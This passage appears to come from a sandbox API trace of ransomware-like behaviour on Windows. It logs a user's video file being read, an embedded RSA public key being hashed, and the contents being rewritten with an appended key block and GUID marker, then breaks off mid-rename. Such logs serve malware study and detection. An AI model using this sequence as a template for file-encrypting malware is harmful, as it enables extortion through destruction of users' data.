"c:\\users\\5p5nrgjn0js halpmcxz\\videos\\rd1ggktklkvj.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0131.765] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=38640) returned 1 [0131.765] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.768] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x96ca, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.768] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.769] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.769] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.769] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.769] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x96f0, lpOverlapped=0x0) returned 1 [0131.769] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.769] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.770] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.770] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.770] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0131.771] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.771] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.771] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.771] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.771] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.771] GetLastError () returned 0x0 [0131.771] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0131.771] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0131.771] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.771] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.771] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.771] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0131.771] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.771] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.771] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.771] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x96f0) returned 0xdd35410 [0131.772] SetFilePointer (in: hFile=0x610, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0131.772] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0131.772] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0131.772] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0131.772] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0131.772] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0131.772] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd351a8 [0131.772] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0131.772] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd351f0 [0131.772] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171c0 [0131.772] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17238 [0131.772] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0131.772] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17250 [0131.772] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0131.772] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0131.772] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.772] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.772] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17238 | out: hHeap=0x4970000) returned 1 [0131.772] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17250 | out: hHeap=0x4970000) returned 1 [0131.772] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0131.772] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0131.772] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.772] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0131.772] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0131.772] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17250 [0131.772] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf168 [0131.772] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd17238 [0131.772] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0131.773] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0131.773] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0131.773] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0131.773] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0131.773] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0131.773] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdbc8 [0131.773] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0131.773] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.773] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17250 | out: hHeap=0x4970000) returned 1 [0131.773] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.773] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17238 | out: hHeap=0x4970000) returned 1 [0131.773] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf168 | out: hHeap=0x4970000) returned 1 [0131.773] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.773] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0131.773] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.773] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0131.773] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0131.773] GetCurrentThreadId () returned 0x618 [0131.773] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0131.773] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0xdd2df60 [0131.773] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750ca48 [0131.773] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0131.773] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0131.773] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.773] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0131.773] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0131.773] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.773] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.773] GetCurrentThreadId () returned 0x618 [0131.773] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.774] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.774] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0131.774] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.774] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.774] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.774] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.774] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.774] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0131.774] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.774] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c9b0 [0131.774] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.774] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0131.774] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0131.774] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0131.774] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0131.774] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0131.774] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.774] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0131.774] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0131.774] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0131.774] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0131.774] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0131.774] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17238 [0131.774] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.774] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0131.774] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0131.774] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0131.774] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0131.774] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0131.774] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0131.774] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17250 [0131.775] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0131.775] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf168 [0131.775] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0131.775] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17220 [0131.775] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0131.775] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17178 [0131.775] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0131.775] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e18 [0131.775] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0131.775] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0131.775] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0131.775] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0131.775] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0131.775] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17268 [0131.775] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0131.775] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17208 [0131.775] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0131.775] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8c0 [0131.775] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.775] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0131.775] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0131.775] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce8f58 [0131.775] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17238 | out: hHeap=0x4970000) returned 1 [0131.775] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17238 [0131.775] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.775] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd206b0 [0131.775] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0131.775] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75039b8 [0131.775] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0131.775] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0131.776] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.776] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0131.776] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0131.776] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0131.776] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17238 | out: hHeap=0x4970000) returned 1 [0131.776] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdcfc0b8 [0131.776] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75039b8 | out: hHeap=0x4970000) returned 1 [0131.776] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0131.776] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.776] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0131.776] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0131.776] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24890 | out: hHeap=0x4970000) returned 1 [0131.776] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0131.776] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0131.776] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0131.776] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfc0b8 | out: hHeap=0x4970000) returned 1 [0131.776] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.776] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0131.776] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17268 | out: hHeap=0x4970000) returned 1 [0131.776] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0131.776] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0131.776] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf168 | out: hHeap=0x4970000) returned 1 [0131.776] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17250 | out: hHeap=0x4970000) returned 1 [0131.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17220 | out: hHeap=0x4970000) returned 1 [0131.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0131.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0131.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0131.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171c0 | out: hHeap=0x4970000) returned 1 [0131.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd351f0 | out: hHeap=0x4970000) returned 1 [0131.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0131.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0131.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0131.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0131.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0131.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdbc8 | out: hHeap=0x4970000) returned 1 [0131.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0131.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0131.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0131.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.777] WriteFile (in: hFile=0x610, lpBuffer=0xdd35410*, nNumberOfBytesToWrite=0x96eb, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd35410*, lpNumberOfBytesWritten=0xe00fb14*=0x96eb, lpOverlapped=0x0) returned 1 [0131.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd35410 | out: hHeap=0x4970000) returned 1 [0131.778] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x96f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.778] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.778] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0131.778] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5cf0 [0131.778] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0xdd19550 [0131.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0xdd19550, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0131.778] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdce69c8 [0131.778] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0131.778] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5cf0 | out: hHeap=0x4970000) returned 1 [0131.778] WriteFile (in: hFile=0x610, lpBuffer=0xdce69c8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdce69c8*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0131.778] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.778] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.778] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.778] CloseHandle (hObject=0x610) returned 1 [0131.780] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2758 [0131.780] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0x74fb288 [0131.780] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2758 | out: hHeap=0x4970000) returned 1 [0131.780] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RD1ggKtKLkvJ.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\rd1ggktklkvj.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS 